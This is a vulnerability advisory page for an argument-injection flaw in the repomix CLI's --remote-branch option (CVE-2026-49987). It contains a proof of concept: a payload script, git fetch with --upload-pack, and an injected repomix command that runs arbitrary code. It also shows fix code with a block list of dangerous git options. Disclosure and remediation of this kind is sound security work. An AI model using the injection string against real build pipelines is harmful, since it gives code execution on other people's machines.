Skip to main content

repomix EUVDEUVD-2026-44758

| CVE-2026-49987 HIGH
Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') (CWE-88)
2026-07-01 https://github.com/yamadashy/repomix GHSA-9mm9-rqhj-j5mx
7.5
CVSS 4.0 · Vendor: https://github.com/yamadashy/repomix
Share

Severity by source

Vendor (https://github.com/yamadashy/repomix) PRIMARY
7.5 HIGH
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Exploitation needs the victim/pipeline to run repomix with attacker-supplied branch input (UI:R) but no attacker auth (PR:N) and low complexity, yielding full C/I/A impact with no scope change.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/yamadashy/repomix).

CVSS VectorVendor: https://github.com/yamadashy/repomix

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

5
Source Code Evidence Fetched
Jul 15, 2026 - 19:31 vuln.today
Analysis Updated
Jul 15, 2026 - 19:31 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jul 15, 2026 - 19:22 vuln.today
cvss_changed
CVSS changed
Jul 15, 2026 - 19:22 NVD
8.8 (HIGH) 7.5 (HIGH)
Analysis Generated
Jul 01, 2026 - 19:15 vuln.today

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 2 npm packages depend on repomix (2 direct, 0 indirect)

Ecosystem-wide dependent count for version 1.14.1.

DescriptionCVE.org

Vulnerability Metadata

FieldDetail
Affected Componentsrc/core/git/gitCommand.ts (execGitShallowClone)
ImpactArbitrary Command Execution / Security Control Bypass

Summary

The --remote-branch CLI option in repomix is vulnerable to argument injection. User-supplied input is passed directly to git fetch and git checkout subprocesses via child_process.execFileAsync without sanitization, -- delimiters, or validation.

An attacker can inject arbitrary git command-line options. By injecting the --upload-pack option and specifying an SSH (git@...) or local (file://) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing dangerousParams blocklist implemented in validateGitUrl().

Vulnerable Code Analysis

File: src/core/git/gitCommand.ts

The remoteBranch parameter is appended directly to the arguments array for git subprocesses without the -- positional delimiter.

Sink 1 (Lines 118-127):

typescript
await deps.execFileAsync(
  'git',
  ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], // Vulnerable
  gitRemoteOpts,
);

Sink 2 (Lines 148-151):

typescript
await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]); // Vulnerable

Bypassed Security Control (Lines 192-197): The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (--upload-pack, --receive-pack, --config, --exec) within the validateGitUrl function. However, this validation is exclusively applied to the url variable and omitted for remoteBranch, creating a direct bypass.

Attack Flow

text
[Source] repomix --remote-branch <injected_option>
   ↓
src/cli/actions/remoteAction.ts:226 (cloneRepository)
   ↓
src/core/git/gitCommand.ts:118 (execGitShallowClone)
   ↓
[Sink] execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])
   ↓
[Execution] git invokes the payload binary via transport helper

Proof of Concept (Steps to Reproduce)

1. Create the Payload Create an executable bash script that writes system execution context to a file. *(Reference: Screenshot_2026-05-18_13_02_16.png)*

bash
cat > /tmp/malicious-pack << 'EOF'
#!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack

2. Trigger the Vulnerability Establish a dummy remote and trigger the fetch operation, injecting the --upload-pack argument. *(Reference: Screenshot_2026-05-18_13_08_36.png)*

bash
# Setup dummy bare remote
git init --bare /tmp/dummy-remote.git
# Initialize local repo and add remote
mkdir /tmp/test-fetch && cd /tmp/test-fetch
git init
git remote add origin file:///tmp/dummy-remote.git
# Execute vulnerability
git fetch --upload-pack=/tmp/malicious-pack origin 2>&1

3. Verify Execution Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.

bash
cat /tmp/repomix-pwned.txt

*Expected Output:*

text
=== RCE EXECUTED ===
uid=1000(kakashi) gid=1000(kakashi) groups=1000(kakashi)...

End-to-End Execution via Repomix:

bash
repomix --remote git@github.com:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'

Impact

  • Remote Code Execution: Complete system compromise with the privileges of the user executing repomix.
  • CI/CD Compromise: If repomix is utilized in automated pipelines where --remote-branch is populated by external triggers (e.g., webhook payloads, PR titles), attackers can compromise build servers and exfiltrate secrets.

Remediation

1. Implement Positional Delimiters (Primary Fix) Append the -- delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing remoteBranch.

typescript
await deps.execFileAsync(
  'git',
  ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch],
  gitRemoteOpts,
);

2. Apply Existing Blocklist to Branch Parameter (Defense in Depth) Update execGitShallowClone to validate remoteBranch against the existing dangerousParams array.

typescript
const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec'];

if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) {
  throw new RepomixError(`Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}`);
}

Attachments

Screenshot 1: Payload script created with executable permissions. <img width="1920" height="1080" alt="Screenshot_2026-05-18_13_02_16" src="https://github.com/user-attachments/assets/a0ada9de-c689-4ed8-9937-dd7faf6e6cc0" />

Screenshot 2: Vulnerable Code <img width="1920" height="1080" alt="Screenshot_2026-05-18_13_03_44" src="https://github.com/user-attachments/assets/b72c7e05-d857-497a-9ae5-0822f86fa032" />

Screenshot 3: Verifying RCE. <img width="1920" height="1080" alt="Screenshot_2026-05-18_13_08_36" src="https://github.com/user-attachments/assets/f153545e-e5e8-4165-ac1a-f84efbb1c135" />

---

Credits

This vulnerability was discovered and responsibly disclosed by:

AnalysisAI

Arbitrary command execution in repomix (npm package, versions < 1.14.1) arises from argument injection in the --remote-branch CLI option, whose value is passed unsanitized into git fetch and git checkout subprocesses within src/core/git/gitCommand.ts. Because the branch value is not prefixed with a -- positional delimiter and skips the dangerousParams blocklist that validateGitUrl() applies only to the URL, an attacker can inject options such as --upload-pack and, combined with an SSH or file:// remote, execute an arbitrary payload binary with the invoking user's privileges. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Supply crafted --remote-branch to repomix run
Delivery
Inject --upload-pack=payload with SSH/file:// remote
Exploit
git fetch parses value as option
Execution
git invokes payload as transport helper
Impact
Arbitrary code executes as repomix user

Vulnerability AssessmentAI

Exploitation Exploitation requires that repomix (version < 1.14.1) is invoked with an attacker-controlled `--remote-branch` value AND that the remote uses a transport git will honor for the injected option - specifically an SSH (`git@...`) or local (`file://`) remote, so an injected `--upload-pack=<path>` causes git to execute the attacker's binary. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor CVSS 4.0 base score is 7.5 (High), vector AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H - note two tempering metrics: AT:P (a specific attack requirement) and UI:A (active victim interaction), meaning a victim must actually run repomix with attacker-influenced `--remote-branch` input rather than the attacker reaching a listening service directly. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A CI pipeline runs repomix to pack a contributor's fork and derives the `--remote-branch` value from an externally controlled field such as a pull-request branch name. An attacker sets that value to `--upload-pack=/tmp/malicious-pack` (pointing fetch at an SSH or file:// remote hosting the payload), and when repomix runs `git fetch`, git executes the attacker's binary with the build agent's privileges. …
Remediation Vendor-released patch: upgrade repomix to 1.14.1 or later (e.g. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours, inventory all systems, build agents, and containers running repomix versions < 1.14.1, and prioritize those processing external or untrusted repository inputs. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-44758 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy